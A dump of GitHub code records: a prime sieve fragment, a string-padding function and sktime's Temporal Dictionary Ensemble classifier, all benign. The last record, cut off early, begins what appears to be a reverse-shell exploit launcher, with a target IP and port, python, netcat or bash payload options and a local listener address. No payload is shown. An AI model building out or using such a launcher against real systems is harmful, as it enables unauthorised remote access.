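#   if err:
#       return err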
self._is_prime[x] = False\n x += p\n # search for unmarked\n i = prev_max + 1\n while i <= m: # possible new primes\n if self._is_prime[i]: # unmarked\n # mark\n p = i\n self._primes.append(p) # add new prime\n x = i + p # move to 2p\n while x <= m: # 2p, 3p, 4p, ...\n self._is_prime[x] = False\n x += p\n i += 2 # must be odd (unless 2)\n else:\n i += 1\n # update the maximum\n self._max = m\n\n def is_prime(self, i):\n if self._max < i:\n self._set_max(i)\n return self._is_prime[i]\n\n def num_distinct_primes(self, n, max_num):\n if self.is_prime(n):\n return 1\n c = 0\n for p in self._primes:\n if n < p:\n break\n if 0 == n % p:\n c += 1\n if max_num < c:\n return c\n if self._max < n:\n self._set_max(self._max * 2) # double it\n return self.num_distinct_primes(n, max_num)\n return c\n\n def get_max(self):\n return self._max\n\n def get_primes(self):\n i = max(self._primes) + 1\n while i <= self._max:\n if self._is_prime[i]:\n self._primes.append(i)\n i += 1\n return self._primes\n\n def __miller_rabin_helper(self, a, s, d, n):\n a_p = pow(a, d, n)\n if a_p == 1:\n return True\n for j in xrange(s-1):\n if a_p == n - 1:\n return True\n a_p = (a_p * a_p) % n\n return (a_p == n - 1)\n\n def miller_rabin(self, n, k):\n if n <= self._max:\n return self.is_prime(n)\n # compute s and d\n d = n - 1\n s = 0\n while 0 == d % 2:\n d >>= 1\n s += 1\n # test\n for i in xrange(k):\n a = 0\n while a == 0:\n a = random.randrange(n)\n if not self.__miller_rabin_helper(a, s, d, n):\n return False\n return True\n","repo_name":"nh13/euler","sub_path":"src/prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"12118440617","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 20 10:53:01 2014\n\n@author: cicek\n\"\"\"\n\ndef right_justify(s):\n l = len(s)\n l = 70-l\n e = ' '\n r=l*e+s\n print(r)\n \n \n \n ","repo_name":"cicekozkan/python-examples","sub_path":"right_justify.py","file_name":"right_justify.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33996882940","text":"\"\"\"TDE classifiers.\n\nDictionary based TDE classifiers based on SFA transform. Contains a single IndividualTDE\nand TDE.\n\"\"\"\n\n__author__ = [\"MatthewMiddlehurst\"]\n__all__ = [\"TemporalDictionaryEnsemble\", \"IndividualTDE\", \"histogram_intersection\"]\n\nimport math\nimport time\nfrom collections import defaultdict\n\nimport numpy as np\nfrom joblib import Parallel, delayed\nfrom sklearn import preprocessing\nfrom sklearn.kernel_ridge import KernelRidge\nfrom sklearn.utils import check_random_state\n\nfrom sktime.classification.base import BaseClassifier\nfrom sktime.transformations.panel.dictionary_based import SFA\nfrom sktime.utils.validation.panel import check_X_y\nfrom sktime.utils.warnings import warn\n\n\nclass TemporalDictionaryEnsemble(BaseClassifier):\n \"\"\"Temporal Dictionary Ensemble (TDE).\n\n Implementation of the dictionary based Temporal Dictionary Ensemble as described\n in [1]_.\n\n Overview: Input \"n\" series length \"m\" with \"d\" dimensions\n TDE searches \"k\" parameter values selected using a Gaussian processes\n regressor, evaluating each with a LOOCV. 
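The Prime class above still uses Python 2's xrange inside miller_rabin. A standalone Python 3 restatement of the same probabilistic test (the identical decomposition of n - 1 into d * 2**s, then k random witnesses; primes always pass, and a composite slips through with probability at most 4**-k):

import random

def miller_rabin(n: int, k: int = 20) -> bool:
    if n < 2:
        return False
    if n % 2 == 0:
        return n == 2
    d, s = n - 1, 0
    while d % 2 == 0:              # write n - 1 as d * 2**s with d odd
        d //= 2
        s += 1
    for _ in range(k):
        a = random.randrange(2, n - 1) if n > 3 else 1
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = (x * x) % n
            if x == n - 1:
                break
        else:
            return False           # a is a witness that n is composite
    return True

assert miller_rabin(97) and not miller_rabin(91)   # 91 = 7 * 13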
It then retains \"s\"\n ensemble members.\n There are six primary parameters for individual classifiers:\n - alpha: alphabet size\n - w: window length\n - l: word length\n - p: normalise/no normalise\n - h: levels\n - b: MCB/IGB\n For any combination, an individual TDE classifier slides a window of\n length w along the series. The w length window is shortened to\n an l length word through taking a Fourier transform and keeping the\n first l/2 complex coefficients. These lcoefficients are then discretised\n into alpha possible values, to form a word length l using breakpoints\n found using b. A histogram of words for each series is formed and stored,\n using a spatial pyramid of h levels. For multivariate series, accuracy\n from a reduced histogram is used to select dimensions.\n\n fit involves finding n histograms.\n predict uses 1 nearest neighbour with a the histogram intersection\n distance function.\n\n Parameters\n ----------\n n_parameter_samples : int, default=250\n Number of parameter combinations to consider for the final ensemble.\n max_ensemble_size : int, default=50\n Maximum number of estimators in the ensemble.\n max_win_len_prop : float, default=1\n Maximum window length as a proportion of series length, must be between 0 and 1.\n min_window : int, default=10\n Minimum window length.\n randomly_selected_params: int, default=50\n Number of parameters randomly selected before the Gaussian process parameter\n selection is used.\n bigrams : boolean or None, default=None\n Whether to use bigrams, defaults to true for univariate data and false for\n multivariate data.\n dim_threshold : float, default=0.85\n Dimension accuracy threshold for multivariate data, must be between 0 and 1.\n max_dims : int, default=20\n Max number of dimensions per classifier for multivariate data.\n time_limit_in_minutes : int, default=0\n Time contract to limit build time in minutes, overriding n_parameter_samples.\n Default of 0 means n_parameter_samples is used.\n contract_max_n_parameter_samples : int, default=np.inf\n Max number of parameter combinations to consider when time_limit_in_minutes is\n set.\n typed_dict : bool, default=True\n Use a numba typed Dict to store word counts. May increase memory usage, but will\n be faster for larger datasets. As the Dict cannot be pickled currently, there\n will be some overhead converting it to a python dict with multiple threads and\n pickling.\n save_train_predictions : bool, default=False\n Save the ensemble member train predictions in fit for use in _get_train_probs\n leave-one-out cross-validation.\n n_jobs : int, default=1\n The number of jobs to run in parallel for both `fit` and `predict`.\n ``-1`` means using all processors.\n random_state : int or None, default=None\n Seed for random number generation.\n\n Attributes\n ----------\n n_classes_ : int\n The number of classes.\n classes_ : list\n The classes labels.\n n_instances_ : int\n The number of train cases.\n n_dims_ : int\n The number of dimensions per case.\n series_length_ : int\n The length of each series.\n n_estimators_ : int\n The final number of classifiers used (<= max_ensemble_size)\n estimators_ : list of shape (n_estimators) of IndividualTDE\n The collections of estimators trained in fit.\n weights_ : list of shape (n_estimators) of float\n Weight of each estimator in the ensemble.\n\n See Also\n --------\n IndividualTDE, ContractableBOSS\n\n Notes\n -----\n For the Java version, see\n `TSML `_.\n\n References\n ----------\n .. 
[1] Matthew Middlehurst, James Large, Gavin Cawley and Anthony Bagnall\n \"The Temporal Dictionary Ensemble (TDE) Classifier for Time Series\n Classification\", in proceedings of the European Conference on Machine Learning\n and Principles and Practice of Knowledge Discovery in Databases, 2020.\n\n Examples\n --------\n >>> from sktime.classification.dictionary_based import TemporalDictionaryEnsemble\n >>> from sktime.datasets import load_unit_test\n >>> X_train, y_train = load_unit_test(split=\"train\", return_X_y=True)\n >>> X_test, y_test = load_unit_test(split=\"test\", return_X_y=True) # doctest: +SKIP\n >>> clf = TemporalDictionaryEnsemble(\n ... n_parameter_samples=10,\n ... max_ensemble_size=3,\n ... randomly_selected_params=5,\n ... ) # doctest: +SKIP\n >>> clf.fit(X_train, y_train) # doctest: +SKIP\n TemporalDictionaryEnsemble(...)\n >>> y_pred = clf.predict(X_test) # doctest: +SKIP\n \"\"\"\n\n _tags = {\n \"capability:multivariate\": True,\n \"capability:train_estimate\": True,\n \"capability:contractable\": True,\n \"capability:multithreading\": True,\n \"capability:predict_proba\": True,\n \"classifier_type\": \"dictionary\",\n \"python_dependencies\": \"numba\",\n }\n\n def __init__(\n self,\n n_parameter_samples=250,\n max_ensemble_size=50,\n max_win_len_prop=1,\n min_window=10,\n randomly_selected_params=50,\n bigrams=None,\n dim_threshold=0.85,\n max_dims=20,\n time_limit_in_minutes=0.0,\n contract_max_n_parameter_samples=np.inf,\n typed_dict=True,\n save_train_predictions=False,\n n_jobs=1,\n random_state=None,\n ):\n self.n_parameter_samples = n_parameter_samples\n self.max_ensemble_size = max_ensemble_size\n self.max_win_len_prop = max_win_len_prop\n self.min_window = min_window\n self.randomly_selected_params = randomly_selected_params\n self.bigrams = bigrams\n\n # multivariate\n self.dim_threshold = dim_threshold\n self.max_dims = max_dims\n\n self.time_limit_in_minutes = time_limit_in_minutes\n self.contract_max_n_parameter_samples = contract_max_n_parameter_samples\n self.typed_dict = typed_dict\n self.save_train_predictions = save_train_predictions\n self.random_state = random_state\n self.n_jobs = n_jobs\n\n self.n_instances_ = 0\n self.n_dims_ = 0\n self.series_length_ = 0\n self.n_estimators_ = 0\n self.estimators_ = []\n self.weights_ = []\n\n self._word_lengths = [16, 14, 12, 10, 8]\n self._norm_options = [True, False]\n self._levels = [1, 2, 3]\n self._igb_options = [True, False]\n self._alphabet_size = 4\n self._weight_sum = 0\n self._prev_parameters_x = []\n self._prev_parameters_y = []\n self._min_window = min_window\n\n super().__init__()\n\n def _fit(self, X, y):\n \"\"\"Fit an ensemble on cases (X,y), where y is the target variable.\n\n Build an ensemble of base TDE classifiers from the training set (X,\n y), through an optimised selection over the para space to make a fixed size\n ensemble of the best.\n\n Parameters\n ----------\n X : 3D np.array of shape = [n_instances, n_dimensions, series_length]\n The training data.\n y : array-like, shape = [n_instances]\n The class labels.\n\n Returns\n -------\n self :\n Reference to self.\n\n Notes\n -----\n Changes state by creating a fitted model that updates attributes\n ending in \"_\" and sets is_fitted flag to True.\n \"\"\"\n if self.n_parameter_samples <= self.randomly_selected_params:\n warn(\n \"TemporalDictionaryEnsemble warning: n_parameter_samples <= \"\n \"randomly_selected_params, ensemble member parameters will be \"\n \"fully randomly selected.\",\n obj=self,\n stacklevel=2,\n )\n\n 
self.n_instances_, self.n_dims_, self.series_length_ = X.shape\n\n self.estimators_ = []\n self.weights_ = []\n self._prev_parameters_x = []\n self._prev_parameters_y = []\n\n # Window length parameter space dependent on series length\n max_window_searches = self.series_length_ / 4\n max_window = int(self.series_length_ * self.max_win_len_prop)\n\n if self.min_window >= max_window:\n self._min_window = max_window\n warn(\n f\"TemporalDictionaryEnsemble warning: min_window = \"\n f\"{self.min_window} is larger than max_window = {max_window}.\"\n f\" min_window has been set to {max_window}.\",\n obj=self,\n stacklevel=2,\n )\n\n win_inc = int((max_window - self._min_window) / max_window_searches)\n if win_inc < 1:\n win_inc = 1\n\n possible_parameters = self._unique_parameters(max_window, win_inc)\n num_classifiers = 0\n subsample_size = int(self.n_instances_ * 0.7)\n lowest_acc = 1\n lowest_acc_idx = 0\n\n time_limit = self.time_limit_in_minutes * 60\n start_time = time.time()\n train_time = 0\n if time_limit > 0:\n n_parameter_samples = 0\n contract_max_n_parameter_samples = self.contract_max_n_parameter_samples\n else:\n n_parameter_samples = self.n_parameter_samples\n contract_max_n_parameter_samples = np.inf\n\n rng = check_random_state(self.random_state)\n\n if self.bigrams is None:\n if self.n_dims_ > 1:\n use_bigrams = False\n else:\n use_bigrams = True\n else:\n use_bigrams = self.bigrams\n\n # use time limit or n_parameter_samples if limit is 0\n while (\n (\n train_time < time_limit\n and num_classifiers < contract_max_n_parameter_samples\n )\n or num_classifiers < n_parameter_samples\n ) and len(possible_parameters) > 0:\n if num_classifiers < self.randomly_selected_params:\n parameters = possible_parameters.pop(\n rng.randint(0, len(possible_parameters))\n )\n else:\n scaler = preprocessing.StandardScaler()\n scaler.fit(self._prev_parameters_x)\n gp = KernelRidge(kernel=\"poly\", degree=1)\n gp.fit(\n scaler.transform(self._prev_parameters_x), self._prev_parameters_y\n )\n preds = gp.predict(scaler.transform(possible_parameters))\n parameters = possible_parameters.pop(\n rng.choice(np.flatnonzero(preds == preds.max()))\n )\n\n subsample = rng.choice(\n self.n_instances_, size=subsample_size, replace=False\n )\n X_subsample = X[subsample]\n y_subsample = y[subsample]\n\n tde = IndividualTDE(\n *parameters,\n alphabet_size=self._alphabet_size,\n bigrams=use_bigrams,\n dim_threshold=self.dim_threshold,\n max_dims=self.max_dims,\n typed_dict=self.typed_dict,\n n_jobs=self._threads_to_use,\n random_state=self.random_state,\n )\n tde.fit(X_subsample, y_subsample)\n tde._subsample = subsample\n\n tde._accuracy = self._individual_train_acc(\n tde,\n y_subsample,\n subsample_size,\n 0 if num_classifiers < self.max_ensemble_size else lowest_acc,\n )\n if tde._accuracy > 0:\n weight = math.pow(tde._accuracy, 4)\n else:\n weight = 0.000000001\n\n if num_classifiers < self.max_ensemble_size:\n if tde._accuracy < lowest_acc:\n lowest_acc = tde._accuracy\n lowest_acc_idx = num_classifiers\n self.weights_.append(weight)\n self.estimators_.append(tde)\n elif tde._accuracy > lowest_acc:\n self.weights_[lowest_acc_idx] = weight\n self.estimators_[lowest_acc_idx] = tde\n lowest_acc, lowest_acc_idx = self._worst_ensemble_acc()\n\n self._prev_parameters_x.append(parameters)\n self._prev_parameters_y.append(tde._accuracy)\n\n num_classifiers += 1\n train_time = time.time() - start_time\n\n self.n_estimators_ = len(self.estimators_)\n self._weight_sum = np.sum(self.weights_)\n\n return self\n\n def 
_predict(self, X) -> np.ndarray:\n \"\"\"Predict class values of n instances in X.\n\n Parameters\n ----------\n X : 3D np.array of shape = [n_instances, n_dimensions, series_length]\n The data to make predictions for.\n\n Returns\n -------\n y : array-like, shape = [n_instances]\n Predicted class labels.\n \"\"\"\n rng = check_random_state(self.random_state)\n return np.array(\n [\n self.classes_[int(rng.choice(np.flatnonzero(prob == prob.max())))]\n for prob in self._predict_proba(X)\n ]\n )\n\n def _predict_proba(self, X) -> np.ndarray:\n \"\"\"Predict class probabilities for n instances in X.\n\n Parameters\n ----------\n X : 3D np.array of shape = [n_instances, n_dimensions, series_length]\n The data to make predict probabilities for.\n\n Returns\n -------\n y : array-like, shape = [n_instances, n_classes_]\n Predicted probabilities using the ordering in classes_.\n \"\"\"\n _, _, series_length = X.shape\n if series_length != self.series_length_:\n raise TypeError(\n \"ERROR number of attributes in the train does not match \"\n \"that in the test data\"\n )\n\n sums = np.zeros((X.shape[0], self.n_classes_))\n\n for n, clf in enumerate(self.estimators_):\n preds = clf.predict(X)\n for i in range(0, X.shape[0]):\n sums[i, self._class_dictionary[preds[i]]] += self.weights_[n]\n\n return sums / (np.ones(self.n_classes_) * self._weight_sum)\n\n def _worst_ensemble_acc(self):\n min_acc = 1.0\n min_acc_idx = 0\n\n for c, classifier in enumerate(self.estimators_):\n if classifier._accuracy < min_acc:\n min_acc = classifier._accuracy\n min_acc_idx = c\n\n return min_acc, min_acc_idx\n\n def _unique_parameters(self, max_window, win_inc):\n possible_parameters = [\n [win_size, word_len, normalise, levels, igb]\n for normalise in self._norm_options\n for win_size in range(self._min_window, max_window + 1, win_inc)\n for word_len in self._word_lengths\n for levels in self._levels\n for igb in self._igb_options\n ]\n\n return possible_parameters\n\n def _get_train_probs(self, X, y, train_estimate_method=\"loocv\") -> np.ndarray:\n self.check_is_fitted()\n X, y = check_X_y(X, y, coerce_to_numpy=True)\n\n n_instances, n_dims, series_length = X.shape\n\n if (\n n_instances != self.n_instances_\n or n_dims != self.n_dims_\n or series_length != self.series_length_\n ):\n raise ValueError(\n \"n_instances, n_dims, series_length mismatch. X should be \"\n \"the same as the training data used in fit for generating train \"\n \"probabilities.\"\n )\n\n results = np.zeros((n_instances, self.n_classes_))\n divisors = np.zeros(n_instances)\n\n if train_estimate_method.lower() == \"loocv\":\n for i, clf in enumerate(self.estimators_):\n subsample = clf._subsample\n preds = (\n clf._train_predictions\n if self.save_train_predictions\n else Parallel(n_jobs=self._threads_to_use, prefer=\"threads\")(\n delayed(clf._train_predict)(\n i,\n )\n for i in range(len(subsample))\n )\n )\n\n for n, pred in enumerate(preds):\n results[subsample[n]][\n self._class_dictionary[pred]\n ] += self.weights_[i]\n divisors[subsample[n]] += self.weights_[i]\n elif train_estimate_method.lower() == \"oob\":\n indices = range(n_instances)\n for i, clf in enumerate(self.estimators_):\n oob = [n for n in indices if n not in clf._subsample]\n\n if len(oob) == 0:\n continue\n\n preds = clf.predict(X[oob])\n\n for n, pred in enumerate(preds):\n results[oob[n]][self._class_dictionary[pred]] += self.weights_[i]\n divisors[oob[n]] += self.weights_[i]\n else:\n raise ValueError(\n \"Invalid train_estimate_method. 
Available options: loocv, oob\"\n )\n\n for i in range(n_instances):\n results[i] = (\n np.ones(self.n_classes_) * (1 / self.n_classes_)\n if divisors[i] == 0\n else results[i] / (np.ones(self.n_classes_) * divisors[i])\n )\n\n return results\n\n def _individual_train_acc(self, tde, y, train_size, lowest_acc):\n correct = 0\n required_correct = int(lowest_acc * train_size)\n\n if self._threads_to_use > 1:\n c = Parallel(n_jobs=self._threads_to_use, prefer=\"threads\")(\n delayed(tde._train_predict)(\n i,\n )\n for i in range(train_size)\n )\n\n for i in range(train_size):\n if correct + train_size - i < required_correct:\n return -1\n elif c[i] == y[i]:\n correct += 1\n\n if self.save_train_predictions:\n tde._train_predictions.append(c[i])\n\n else:\n for i in range(train_size):\n if correct + train_size - i < required_correct:\n return -1\n\n c = tde._train_predict(i)\n\n if c == y[i]:\n correct += 1\n\n if self.save_train_predictions:\n tde._train_predictions.append(c)\n\n return correct / train_size\n\n @classmethod\n def get_test_params(cls, parameter_set=\"default\"):\n \"\"\"Return testing parameter settings for the estimator.\n\n Parameters\n ----------\n parameter_set : str, default=\"default\"\n Name of the set of test parameters to return, for use in tests. If no\n special parameters are defined for a value, will return `\"default\"` set.\n For classifiers, a \"default\" set of parameters should be provided for\n general testing, and a \"results_comparison\" set for comparing against\n previously recorded results if the general set does not produce suitable\n probabilities to compare against.\n\n Returns\n -------\n params : dict or list of dict, default={}\n Parameters to create testing instances of the class.\n Each dict are parameters to construct an \"interesting\" test instance, i.e.,\n `MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.\n `create_test_instance` uses the first (or only) dictionary in `params`.\n \"\"\"\n if parameter_set == \"results_comparison\":\n return {\n \"n_parameter_samples\": 10,\n \"max_ensemble_size\": 5,\n \"randomly_selected_params\": 5,\n }\n else:\n return {\n \"n_parameter_samples\": 5,\n \"max_ensemble_size\": 2,\n \"randomly_selected_params\": 3,\n \"save_train_predictions\": True,\n }\n\n\nclass IndividualTDE(BaseClassifier):\n \"\"\"Single TDE classifier, an extension of the Bag of SFA Symbols (BOSS) model.\n\n Base classifier for the TDE classifier. Implementation of single TDE base model\n from Middlehurst (2021). [1]_\n\n Overview: input \"n\" series of length \"m\" and IndividualTDE performs a SFA\n transform to form a sparse dictionary of discretised words. 
The resulting\n dictionary is used with the histogram intersection distance function in a\n 1-nearest neighbor.\n\n fit involves finding \"n\" histograms.\n\n predict uses 1 nearest neighbor with the histogram intersection distance function.\n\n Parameters\n ----------\n window_size : int, default=10\n Size of the window to use in the SFA transform.\n word_length : int, default=8\n Length of word to use in the SFA transform.\n norm : bool, default=False\n Whether to normalize SFA words by dropping the first Fourier coefficient.\n levels : int, default=1\n The number of spatial pyramid levels for the SFA transform.\n igb : bool, default=False\n Whether to use Information Gain Binning (IGB) or\n Multiple Coefficient Binning (MCB) for the SFA transform.\n alphabet_size : int, default=4\n Number of possible letters (values) for each word.\n bigrams : bool, default=True\n Whether to record word bigrams in the SFA transform.\n dim_threshold : float, default=0.85\n Accuracy threshold as a proportion of the highest accuracy dimension for words\n extracted from each dimension. Only applicable for multivariate data.\n max_dims : int, default=20\n Maximum number of dimensions words are extracted from. Only applicable for\n multivariate data.\n typed_dict : bool, default=True\n Use a numba TypedDict to store word counts. May increase memory usage, but will\n be faster for larger datasets.\n n_jobs : int, default=1\n The number of jobs to run in parallel for both `fit` and `predict`.\n ``-1`` means using all processors.\n random_state : int or None, default=None\n Seed for the random number generator.\n\n Attributes\n ----------\n n_classes_ : int\n The number of classes.\n classes_ : list\n The class labels.\n n_instances_ : int\n The number of train cases.\n n_dims_ : int\n The number of dimensions per case.\n series_length_ : int\n The length of each series.\n\n See Also\n --------\n TemporalDictionaryEnsemble, SFA\n\n Notes\n -----\n For the Java version, see\n `TSML `_.\n\n References\n ----------\n .. 
[1] Matthew Middlehurst, James Large, Gavin Cawley and Anthony Bagnall\n \"The Temporal Dictionary Ensemble (TDE) Classifier for Time Series\n Classification\", in proceedings of the European Conference on Machine Learning\n and Principles and Practice of Knowledge Discovery in Databases, 2020.\n\n Examples\n --------\n >>> from sktime.classification.dictionary_based import IndividualTDE\n >>> from sktime.datasets import load_unit_test\n >>> X_train, y_train = load_unit_test(split=\"train\", return_X_y=True)\n >>> X_test, y_test = load_unit_test(split=\"test\", return_X_y=True) # doctest: +SKIP\n >>> clf = IndividualTDE() # doctest: +SKIP\n >>> clf.fit(X_train, y_train) # doctest: +SKIP\n IndividualTDE(...)\n >>> y_pred = clf.predict(X_test) # doctest: +SKIP\n \"\"\"\n\n _tags = {\n \"capability:multivariate\": True,\n \"capability:multithreading\": True,\n \"python_dependencies\": \"numba\",\n }\n\n def __init__(\n self,\n window_size=10,\n word_length=8,\n norm=False,\n levels=1,\n igb=False,\n alphabet_size=4,\n bigrams=True,\n dim_threshold=0.85,\n max_dims=20,\n typed_dict=True,\n n_jobs=1,\n random_state=None,\n ):\n self.window_size = window_size\n self.word_length = word_length\n self.norm = norm\n self.levels = levels\n self.igb = igb\n self.alphabet_size = alphabet_size\n self.bigrams = bigrams\n\n # multivariate\n self.dim_threshold = dim_threshold\n self.max_dims = max_dims\n\n self.typed_dict = typed_dict\n self.n_jobs = n_jobs\n self.random_state = random_state\n\n self.n_instances_ = 0\n self.n_dims_ = 0\n self.series_length_ = 0\n\n self._transformers = []\n self._transformed_data = []\n self._class_vals = []\n self._dims = []\n self._highest_dim_bit = 0\n self._accuracy = 0\n self._subsample = []\n self._train_predictions = []\n\n super().__init__()\n\n # todo remove along with BOSS and SFA workarounds when Dict becomes serialisable.\n def __getstate__(self):\n \"\"\"Return state as dictionary for pickling, required for typed Dict objects.\"\"\"\n state = self.__dict__.copy()\n if self.typed_dict:\n nl = [None] * len(self._transformed_data)\n for i, ndict in enumerate(state[\"_transformed_data\"]):\n pdict = dict()\n for key, val in ndict.items():\n pdict[key] = val\n nl[i] = pdict\n state[\"_transformed_data\"] = nl\n return state\n\n def __setstate__(self, state):\n \"\"\"Set current state using input pickling, required for typed Dict objects.\"\"\"\n from numba import types\n from numba.typed import Dict\n\n self.__dict__.update(state)\n if self.typed_dict:\n nl = [None] * len(self._transformed_data)\n for i, pdict in enumerate(self._transformed_data):\n ndict = (\n Dict.empty(\n key_type=types.UniTuple(types.int64, 2), value_type=types.uint32\n )\n if self.levels > 1 or self.n_dims_ > 1\n else Dict.empty(key_type=types.int64, value_type=types.uint32)\n )\n for key, val in pdict.items():\n ndict[key] = val\n nl[i] = ndict\n self._transformed_data = nl\n\n def _fit(self, X, y):\n \"\"\"Fit a single base TDE classifier on n_instances cases (X,y).\n\n Parameters\n ----------\n X : 3D np.array of shape = [n_instances, n_dimensions, series_length]\n The training data.\n y : array-like, shape = [n_instances]\n The class labels.\n\n Returns\n -------\n self :\n Reference to self.\n\n Notes\n -----\n Changes state by creating a fitted model that updates attributes\n ending in \"_\" and sets is_fitted flag to True.\n \"\"\"\n from numba import types\n from numba.typed import Dict\n\n self.n_instances_, self.n_dims_, self.series_length_ = X.shape\n self._class_vals = y\n\n # 
select dimensions using accuracy estimate if multivariate\n if self.n_dims_ > 1:\n self._dims, self._transformers = self._select_dims(X, y)\n\n words = (\n [\n Dict.empty(\n key_type=types.UniTuple(types.int64, 2), value_type=types.uint32\n )\n for _ in range(self.n_instances_)\n ]\n if self.typed_dict\n else [defaultdict(int) for _ in range(self.n_instances_)]\n )\n\n for i, dim in enumerate(self._dims):\n X_dim = X[:, dim, :].reshape(self.n_instances_, 1, self.series_length_)\n dim_words = self._transformers[i].transform(X_dim, y)\n dim_words = dim_words[0]\n\n for n in range(self.n_instances_):\n if self.typed_dict:\n for word, count in dim_words[n].items():\n if self.levels > 1:\n words[n][\n (word[0], word[1] << self._highest_dim_bit | dim)\n ] = count\n else:\n words[n][(word, dim)] = count\n else:\n for word, count in dim_words[n].items():\n words[n][word << self._highest_dim_bit | dim] = count\n\n self._transformed_data = words\n else:\n self._transformers.append(\n SFA(\n word_length=self.word_length,\n alphabet_size=self.alphabet_size,\n window_size=self.window_size,\n norm=self.norm,\n levels=self.levels,\n binning_method=\"information-gain\" if self.igb else \"equi-depth\",\n bigrams=self.bigrams,\n remove_repeat_words=True,\n lower_bounding=False,\n save_words=False,\n use_fallback_dft=True,\n typed_dict=self.typed_dict,\n n_jobs=self._threads_to_use,\n )\n )\n sfa = self._transformers[0].fit_transform(X, y)\n self._transformed_data = sfa[0]\n\n def _predict(self, X):\n \"\"\"Predict class values of all instances in X.\n\n Parameters\n ----------\n X : 3D np.array of shape = [n_instances, n_dimensions, series_length]\n The data to make predictions for.\n\n Returns\n -------\n y : array-like, shape = [n_instances]\n Predicted class labels.\n \"\"\"\n from numba import types\n from numba.typed import Dict\n\n num_cases = X.shape[0]\n\n if self.n_dims_ > 1:\n words = (\n [\n Dict.empty(\n key_type=types.UniTuple(types.int64, 2), value_type=types.uint32\n )\n for _ in range(num_cases)\n ]\n if self.typed_dict\n else [defaultdict(int) for _ in range(num_cases)]\n )\n\n for i, dim in enumerate(self._dims):\n X_dim = X[:, dim, :].reshape(num_cases, 1, self.series_length_)\n dim_words = self._transformers[i].transform(X_dim)\n dim_words = dim_words[0]\n\n for n in range(num_cases):\n if self.typed_dict:\n for word, count in dim_words[n].items():\n if self.levels > 1:\n words[n][\n (word[0], word[1] << self._highest_dim_bit | dim)\n ] = count\n else:\n words[n][(word, dim)] = count\n else:\n for word, count in dim_words[n].items():\n words[n][word << self._highest_dim_bit | dim] = count\n\n test_bags = words\n else:\n test_bags = self._transformers[0].transform(X)\n test_bags = test_bags[0]\n\n classes = Parallel(n_jobs=self._threads_to_use, prefer=\"threads\")(\n delayed(self._test_nn)(\n test_bag,\n )\n for test_bag in test_bags\n )\n\n return np.array(classes)\n\n def _test_nn(self, test_bag):\n rng = check_random_state(self.random_state)\n\n best_sim = -1\n nn = None\n\n for n, bag in enumerate(self._transformed_data):\n sim = histogram_intersection(test_bag, bag)\n\n if sim > best_sim or (sim == best_sim and rng.random() < 0.5):\n best_sim = sim\n nn = self._class_vals[n]\n\n return nn\n\n def _select_dims(self, X, y):\n self._highest_dim_bit = (math.ceil(math.log2(self.n_dims_))) + 1\n accs = []\n transformers = []\n\n # select dimensions based on reduced bag size accuracy\n for i in range(self.n_dims_):\n self._dims.append(i)\n transformers.append(\n SFA(\n 
word_length=self.word_length,\n alphabet_size=self.alphabet_size,\n window_size=self.window_size,\n norm=self.norm,\n levels=self.levels,\n binning_method=\"information-gain\" if self.igb else \"equi-depth\",\n bigrams=self.bigrams,\n remove_repeat_words=True,\n lower_bounding=False,\n save_words=False,\n keep_binning_dft=True,\n use_fallback_dft=True,\n typed_dict=self.typed_dict,\n n_jobs=self._threads_to_use,\n )\n )\n\n X_dim = X[:, i, :].reshape(self.n_instances_, 1, self.series_length_)\n\n transformers[i].fit(X_dim, y)\n sfa = transformers[i].transform(\n X_dim,\n y,\n )\n transformers[i].keep_binning_dft = False\n transformers[i].binning_dft = None\n\n correct = 0\n for i in range(self.n_instances_):\n if self._train_predict(i, sfa[0]) == y[i]:\n correct = correct + 1\n\n accs.append(correct)\n\n max_acc = max(accs)\n\n dims = []\n fin_transformers = []\n for i in range(self.n_dims_):\n if accs[i] >= max_acc * self.dim_threshold:\n dims.append(i)\n fin_transformers.append(transformers[i])\n\n if len(dims) > self.max_dims:\n rng = check_random_state(self.random_state)\n idx = rng.choice(len(dims), self.max_dims, replace=False).tolist()\n dims = [dims[i] for i in idx]\n fin_transformers = [fin_transformers[i] for i in idx]\n\n return dims, fin_transformers\n\n def _train_predict(self, train_num, bags=None):\n if bags is None:\n bags = self._transformed_data\n\n test_bag = bags[train_num]\n best_sim = -1\n nn = None\n\n for n, bag in enumerate(bags):\n if n == train_num:\n continue\n\n sim = histogram_intersection(test_bag, bag)\n\n if sim > best_sim:\n best_sim = sim\n nn = self._class_vals[n]\n\n return nn\n\n\ndef histogram_intersection(first, second):\n \"\"\"Find the distance between two histograms using the histogram intersection.\n\n This distance function is designed for sparse matrices, represented as a\n dictionary or numba Dict, but can accept arrays.\n\n Parameters\n ----------\n first : dict, numba.Dict or array\n First dictionary used in distance measurement.\n second : dict, numba.Dict or array\n Second dictionary that will be used to measure distance from `first`.\n\n Returns\n -------\n dist : float\n The histogram intersection distance between the first and second dictionaries.\n \"\"\"\n from numba.typed import Dict\n\n from sktime.classification.dictionary_based._tde_numba import (\n _histogram_intersection_dict,\n )\n\n if isinstance(first, dict):\n sim = 0\n for word, val_a in first.items():\n val_b = second.get(word, 0)\n sim += min(val_a, val_b)\n return sim\n elif isinstance(first, Dict):\n return _histogram_intersection_dict(first, second)\n else:\n return np.sum(\n [\n 0 if first[n] == 0 else min(first[n], second[n])\n for n in range(len(first))\n ]\n )\n","repo_name":"sktime/sktime","sub_path":"sktime/classification/dictionary_based/_tde.py","file_name":"_tde.py","file_ext":"py","file_size_in_byte":37045,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"35946616550","text":"#!/usr/bin/python3\nimport argparse\nimport socket\nimport base64\n\n# Sets the target ip and port from argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('ip', help='target ip')\nparser.add_argument('port', help='target port', type=int)\nparser.add_argument('-payload', help='set payload type', required=True, choices=['python', 'netcat', 'bash'])\nargs = parser.parse_args()\n\n# Sets the local ip and port (address and port to listen on)\nlocal_ip = '' # CHANGE THIS\nlocal_port = '' # CHANGE THIS \n\n# The 
